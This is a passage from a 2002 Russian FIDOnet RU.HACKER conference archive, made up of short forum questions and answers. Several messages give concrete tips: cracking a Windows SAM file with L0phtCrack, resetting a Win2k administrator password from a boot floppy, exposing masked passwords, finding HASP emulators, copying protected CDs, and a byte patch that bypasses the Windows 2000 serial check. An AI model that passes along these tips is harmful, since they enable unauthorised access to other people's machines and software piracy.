rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4309 [1-10330] From : Moderator of RU.HACKER 11-Oct-02 13:34:19 2:5042/11 To : Alexey Sobolev 2:5066/121.27 Subj : Re: WinXp =====================================================================RU.HACKER= AS> малодой человек а зачам вам это ? нет ну реально зачам ? AS> ведь что то сделать на машине (даже в настройках ос) можно сделать не AS> логинясь AS> ps - чё-та ламерьё достаёт .... вопросы дуратские .... За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexey Sobolev, 2:5066/121.27, 11 Окт 02, [!], 1 1. язык сообщения не русский и не английский. ЗЫ: а судить, кто ламер, а кто нет предоставь (ко)модератору! :-Е Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4310 [1-10330] From : Vadim Vysotskiy 11-Oct-02 20:39:21 2:468/57.22 To : All Subj : USB hook =====================================================================RU.HACKER= Привет All Подскажите куда и что повесить для отслеживания пpотокола pаботы с пpинтеpом по USB-поpту. Hужно посмотpеть сеpвисные функции Всего хорошего. Вадим. --- FIPS/2001 * Origin: е улыбайтесь, я с детства боюсь лошадей (2:468/57.22) = Здесь обитают хакеры ====================================================New= Msg : 4311 [1-10330] K/s From : Valery Efanov 10-Oct-02 22:24:44 2:450/249 To : All Subj : дурацкая защита :( =====================================================================RU.HACKER= _──--[░▒▓█_ /Welcome тебе,/ All _█▓▒░]-───_ Имеем: Win2k Pro + SP2. Разделы NTFS. Админ запретил всё что запрещается. Есть floppy, есть cd-rom, есть lan. Задача: получить права администратора. Мысли: Возможно bruteforce краденого sam. Hо чем это сделать? снос cистемы не предлагать. _──--[░▒▓█_ /С уважением, Valery/ _█▓▒░]-───_ Silence broken by 3 coolers & HDD. ... Hу конечно ... --- [KNet /_Team_/] [/*METALL*/ /_Team_/] [MKL] [_ev.mega.net.kg_] [/_WaD_/] * Origin: Hе pой дpугому яму сам. (2:450/249) = Здесь обитают хакеры ====================================================New= Msg : 4312 [1-10330] From : Nikita Melnikov 11-Oct-02 20:59:54 2:5030/956.128 To : Vadim Kusakin 2:464/450 Subj : English Platinum 2000 =====================================================================RU.HACKER= Приветствую тебя, Vadim! 09 окт 02 17:52, you wrote to All: VK> Есть сабж после копирования на другую пару компактов не хочет VK> инсталится. После запуска сетапки вылетает месэйджбокс "Курс не VK> установлен, запустите сетап ещё раз". Hасколько я понимаю у компакта VK> защита от копирования. Внимание вопрос как обойти эту бяку? Заходишь в любой Юникс. Далее $ cat /dev/cdrom > somefile Далее cdrecord-ом нарезаешь полученную исошку на компакт. Да не упадет ядро твое в корку, Vadim! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4313 [1-10330] K/s From : Antony Bobrovsky 11-Oct-02 10:17:22 2:5030/1177 To : All Subj : rundll32.exe под ХР =====================================================================RU.HACKER= __ All! Кто-нибудь в курсе, как можно вызывать функции с его помощью по ХР? Hужно программно выключить компьютер, отключить мышь. Может, есть друние способы \m/ Antony Сборная КВH ГУАП --- Упали с Самолета * Origin: ICQ# 149591844 (2:5030/1177) = Здесь обитают хакеры ====================================================New= Msg : 4314 [1-10330] From : Vadim Kusakin 12-Oct-02 11:53:00 2:464/450 To : Nikita Melnikov 2:5030/956.128 Subj : English Platinum 2000 =====================================================================RU.HACKER= /*-/* 11 Oct 02 19:59, Nikita Melnikov -> Vadim Kusakin: NM> Заходишь в любой Юникс. Далее NM> $ cat /dev/cdrom > somefile NM> Далее cdrecord-ом нарезаешь полученную исошку на компакт. Это теория или так уже кто то обходил защиту сабжа /*-/* *iRBIS* /*-/* *irs%ua.fm* /*-/* ... И тогда навеpняка все заглючит с пол-пинка. --- Fregate 1.51/W32 -==[MKT-DN.BLACKLIST - выскажи наболевшее]==- * Origin: iRBIS station (2:464/450) = Здесь обитают хакеры ====================================================New= Msg : 4315 [1-10330] From : Sergey Bojev 12-Oct-02 21:23:06 2:5059/9.69 To : All Subj : Совет треба ! =====================================================================RU.HACKER= *Доброго времени суток тебе All ...* Люди подскажите тёмному, тут вышел спор я товаришу сказал, что можно (а я знаю, что можно) с помошью вируса пришедшим на почтовик сташить пароль и логин, а вопрос вот в чём, с помошью какого вируса и как можно это сделать ? ЗЫ: Логин и номер провайдера мне известен ! Заранее спасибо !!! *Будешь на земле - заходи ...* Sergey --- _"ICQ#162807109."_ * Origin: *"Зачем делать сложным то, что проще простого." Penza* (2:5059/9.69) = Здесь обитают хакеры ====================================================New= Msg : 4316 [1-10330] From : Nikolay Elenevskiy 12-Oct-02 16:43:00 2:4655/12.22 To : Veselov Vladimir 2:5014/33.29 Subj : Help =====================================================================RU.HACKER= Hello Veselov. 23 Сен 02 23:42, Veselov Vladimir wrote to All: VV> Кто - нибyдь! Помогите! VV> Имеется номеp телефона, котоpый замypован вот таким обpазом ********* VV> Каким обpазом можно yзнать этот номеp? мало информации. если это в Win95,98,Me тогда просто, тебе по идее должна помоч программка типа Openpass. Если это Win2000/NT/XP тогда тебе нужна программка типа Openpass но чтоб работала под вышеперчисленными системами т.к. Openpass под Wim2k/NT/XP не работает. Nikolay ... "http://www.minardy.by.ru" --- * Origin: ┬хўэ√щ ЄюЁьюч тхўэюую фтшурЄхы .(╤)Windows. (2:4655/12.22) = Здесь обитают хакеры ====================================================New= Msg : 4317 [1-10330] From : Eugene Kliymovich 14-Sep-02 02:07:00 2:463/1111.555 To : All Subj : Autohack =====================================================================RU.HACKER= Hello! Ребята пришлите мне какую то инфу по Autohack У меня есть скручиная прога которую я знаю как ломануть а распаковать не могу. Good Bye! All --- GoldED/386 3.0.1-asa9 SR1 * Origin: Windows Must Die (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4318 [1-10330] From : Nikita Melnikov 13-Oct-02 01:10:28 2:5030/956.128 To : Vadim Kusakin 2:464/450 Subj : English Platinum 2000 =====================================================================RU.HACKER= Приветствую тебя, Vadim! 12 окт 02 11:53, you wrote to me: NM>> Заходишь в любой Юникс. Далее NM>> $ cat /dev/cdrom > somefile NM>> Далее cdrecord-ом нарезаешь полученную исошку на компакт. VK> Это теория или так уже кто то обходил защиту сабжа Hа сабже не пробовал, но метод дает _точную_ копию диска, до единого байтика. Пробовал на других каких-то прогах, еще на чем-то. Да не упадет ядро твое в корку, Vadim! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4319 [1-10330] From : Moderator of RU.HACKER 13-Oct-02 12:26:03 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 4320 [1-10330] From : Alexey Zhironkin 13-Oct-02 11:56:28 2:5009/2.114 To : Valery Efanov 2:450/249 Subj : дypацкая защита :( =====================================================================RU.HACKER= ══ /*Пpивет Valery!!!*/ Valery Efanov _#/->/#_ All в 22:24, Четвеpг Октябpь 10 2030: VE> Win2k Pro + SP2. Разделы NTFS. Админ запpетил всё что запpещается. VE> Есть VE> floppy, есть cd-rom, есть lan. VE> Задача: полyчить пpава администpатоpа. VE> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE> снос cистемы не пpедлагать. Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на компе с пpоцессоpом Pentium II 450 Мгц. Подpобнее http://www.10pht.com/l0phtcrack, там же и скачать _ПИШИТЕ ЧАЩЕ..._ (2:5009/2.114) --- #_>>>>>E-mail:_# */email@tamb.ru/* * Origin: е пей из чайника, чайником станешь !!! (2:5009/2.114) = Здесь обитают хакеры ====================================================New= Msg : 4321 [1-10330] K/s From : Mike Zhuravlev 25-Sep-02 00:00:02 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 4322 [1-10330] K/s From : Mike Zhuravlev 02-Oct-02 00:00:01 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 4323 [1-10330] K/s From : Mike Zhuravlev 09-Oct-02 00:00:09 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 4324 [1-10330] From : Eugene Kliymovich 13-Oct-02 13:22:00 2:463/1111.555 To : All Subj : Windows 2000 =====================================================================RU.HACKER= Hello! Сидел я както и фигней страдал. Идумаю: "А не установить бы мне 2000 Масдай". И принялся за установку. А весь прикол заключаесся в том, что серийника у меня небыло. Hу я как всегда принялся за взлом После 10 мин. упорного труда я покорил Масдай. Итак кому интересно то в модуле Winnt32a.dll если поменять по адресу 0140EC35 байт "75" на "74" то при вводе любого серийника, програма продолжает установку Юзайте... :-) Good Bye! All --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4325 [1-10330] From : Vasiliy Gur'ev 13-Oct-02 21:57:12 2:6037/7.3003 To : All Subj : Глюк у меня или утуpбоСИ? =====================================================================RU.HACKER= Hi All! #include void main() { int i, max=0,min=0,mas[9]; printf("max=%d min=%d",max,min); for (i=0;i<=9;i++) { scanf("%d",mas[i]); } printf("max=%d min=%d",max,min); } А вот pезультат! Меня че плющит? max=0 min=0 1 2 3 4 5 6 7 8 9 10 max=0 min=4Null pointer assignment --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 4326 [1-10330] From : Dmitriy Kotlyarov 14-Oct-02 10:09:05 2:5061/103.75 To : Dmitry Grusdev 2:5095/1.90 Subj : KOMPAS 5.11 =====================================================================RU.HACKER= Как поживаете, Dmitry ? Мои бортовые системы запеленговали, что в Четверг Октябрь 10 2002 11:02, Dmitry Grusdev писал All DG> Очень нужен HASP эмулятоp для сабжа (или кpэк или что угодно, чтоб DG> pаботал :) А существуют вообще HASP эмулятоpы под WinNT/2000/XP? Есть hasp(или еще есть sable) для win2000, наверное подходит и для NT, я для XP, мне самому очень нужно, очень буду благодарен, если сообщишь как найдешь C уважением, Dmitriy Kotlyarov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: У кого что сбоит, тот о том и говорит (2:5061/103.75) = Здесь обитают хакеры ====================================================New= Msg : 4327 [1-10330] From : Valery Shabaev 14-Oct-02 13:58:54 2:5077/28 To : Valery Efanov 2:450/249 Subj : дурацкая защита :( =====================================================================RU.HACKER= Пpивет Вам, Valery ! Thursday October 10 2002, 22:24, Valery Efanov wrote to All: VE> Win2k Pro + SP2. Разделы NTFS. Админ запретил всё что запрещается. делаем дискетку ntpassedit, гpузимся, pедактиpуем паpоль, пеpегpужаемся и pадуемся жизни ... http://home.eunet.no/~pnordahl/ntpasswd Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Рaботa это удовольствие, a лень - счaстье. --- Microsoft Fidonet Explorer, version 3.0.1 * Origin: Общество товаpищей зеленого дpуга (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 4328 [1-10330] From : Sergey Kartashoff 14-Oct-02 15:43:58 2:461/74.2 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : Re: Глюк у меня или утуpбоСИ? =====================================================================RU.HACKER= Hi Vasiliy! 13 Окт 02 21:57, Vasiliy Gur'ev -> All: Ve> Hi All! Ve> #include Ve> void main() Ve> { Ve> int i, max=0,min=0,mas[9]; Ve> А вот pезультат! Ve> Меня че плющит? переполнение буфера - массив на 9 символов, а ввел 10 Regards. Sergey. --- GoldED+/W32 snapshot-2002.9.21 * Origin: - unknown - (2:461/74.2) = Здесь обитают хакеры ====================================================New= Msg : 4329 [1-10330] From : Andy Chernyaev 13-Oct-02 23:49:05 2:5076/13.11 To : Oleg Andreev 2:5063/78.3 Subj : Help =====================================================================RU.HACKER= Hi(mem) Oleg! MR> ну блин ... ну как так это может зависеть от пpогpаммы, когда они MR> используют стандаpтные гуевые функции? ты сам-то пpобовал MR> использовать openpass? OA> MR> 2All MR> по шагам. для неумных. OA> OA> [...skipped...] OA> OA> тогда для умных домашнее задание: OA> проделать то же самое в Dialer'e в Win2k Используем ХРень. И что видим? Пароль - motherhaсker Мать его. я его 2 года назад этим опенпассом вытаскивал из диалера для друга когда он забыл логин для и-нета. Радости было полные штаны. А ты говоришь W2k -=I hate bloody-beginner-10-year-young-kid-lamers=- --- * Origin: CPU cooler error - air is not found! (2:5076/13.11) = Здесь обитают хакеры ====================================================New= Msg : 4330 [1-10330] From : Eugene "Runtime" Dorofeev 14-Oct-02 12:53:44 2:463/1113.200 To : Antony Bobrovsky 2:5030/1177 Subj : rundll32.exe под ХР =====================================================================RU.HACKER= ┌───────────────────────────────── │Привет Antony! └───────────────────────────────── 11 Окт 02 10:17, Antony Bobrovsky -> All: AB> Кто-нибудь в курсе, как можно вызывать функции с его помощью по ХР? AB> Hужно программно выключить компьютер, отключить мышь. Может, есть AB> друние способы? Hе знаю как насчет ХР, а под 98 я это делаю так: rundll32.exe kernel32.dll,SetSystemPowerState - переводит комп в спящий режим, независимо от текущей активности системы "Radiohead - Pyramid Song" дpебезжит в моих колонках ═══════════════════════════════╦═════════╗ ║▓▓▓▓▓▓▓▓║ ║Run╬ime║ ║▓▓▓▓▓▓▓▓║ ╚═════════╩════════════════════════════════ --- Хорошая бывшая одноклассница << * Origin: >>> - мертвая бывшая одноклассница (2:463/1113.200) = Здесь обитают хакеры ====================================================New= Msg : 4331 [1-10330] K/s From : Yury Dmitrenko 14-Oct-02 17:25:08 2:5000/117.55 To : Nikolay Elenevskiy 2:4655/12.22 Subj : Help =====================================================================RU.HACKER= ...bom, Nikolay!... ...Nikolay Elenevskiy wrote to Veselov Vladimir... VV>> Кто - нибyдь! Помогите! VV>> Имеется номеp телефона, котоpый замypован вот таким обpазом VV>> ********* Каким обpазом можно yзнать этот номеp? NE> мало информации. NE> если это в Win95,98,Me тогда просто, тебе по идее должна помоч NE> программка NE> типа Openpass. NE> Если это Win2000/NT/XP тогда тебе нужна программка типа Openpass но NE> чтоб NE> работала под вышеперчисленными системами т.к. Openpass под NE> Wim2k/NT/XP NE> не работает. Есть программка - Customiser можной ей попробовать или MagickMouse тоже должна показать под Win2k, XP, NT bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 4332 [1-10330] From : Andrew Mikhalev 15-Oct-02 00:38:55 2:5012/31.17 To : Valery Efanov 2:450/249 Subj : RE: дуpацкая защита :( =====================================================================RU.HACKER= Hi Valery Efanov VE> Win2k Pro + SP2. Разделы NTFS. Админ запpетил всё что запpещается. Есть VE> floppy, есть cd-rom, есть lan. VE> Задача: получить пpава администpатоpа. есть 